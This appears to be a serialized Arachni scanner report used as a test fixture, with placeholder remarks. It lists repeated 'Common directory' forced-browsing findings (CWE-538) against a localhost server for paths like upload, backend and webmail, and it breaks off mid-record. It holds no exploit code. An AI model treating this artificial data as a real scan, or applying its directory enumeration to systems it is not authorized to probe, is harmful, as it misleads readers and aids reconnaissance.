!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/INSTALL_admin/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/INSTALL_admin/
injected: INSTALL_admin
id: INSTALL_admin
elem: path
remarks: {}
method: ''
response: INSTALL_admin
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTM=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/incomming/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/incomming/
injected: incomming
id: incomming
elem: path
remarks: {}
method: ''
response: incomming
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/upload/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/upload/
injected: upload
id: upload
elem: path
remarks:
:stuff:
- Blah
- Blah2
method: ''
response: upload
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/backend/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/backend/
injected: backend
id: backend
elem: path
remarks: {}
method: ''
response: backend
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/webmail/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/webmail/
injected: webmail
id: webmail
elem: path
remarks: {}
method: ''
response: webmail
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/WebService/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/WebService/
injected: WebService
id: WebService
elem: path
remarks:
:stuff:
- Blah
- Blah2
method: ''
response: WebService
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTA=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/aspnet/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/aspnet/
injected: aspnet
id: aspnet
elem: path
remarks: {}
method: ''
response: aspnet
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/Exchange/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/Exchange/
injected: Exchange
id: Exchange
elem: path
remarks: {}
method: ''
response: Exchange
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/usage/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/usage/
injected: usage
id: usage
elem: path
remarks: {}
method: ''
response: usage
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/WebApplication1/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/WebApplication1/
injected: WebApplication1
id: WebApplication1
elem: path
remarks: {}
method: ''
response: WebApplication1
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTU=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/WebApplication2/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/WebApplication2/
injected: WebApplication2
id: WebApplication2
elem: path
remarks: {}
method: ''
response: WebApplication2
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTU=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/restricted/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/restricted/
injected: restricted
id: restricted
elem: path
remarks: {}
method: ''
response: restricted
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTA=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/WebApplication3/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/WebApplication3/
injected: WebApplication3
id: WebApplication3
elem: path
remarks: {}
method: ''
response: WebApplication3
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTU=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/blog/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/blog/
injected: blog
id: blog
elem: path
remarks: {}
method: ''
response: blog
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/sign/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/sign/
injected: sign
id: sign
elem: path
remarks: {}
method: ''
response: sign
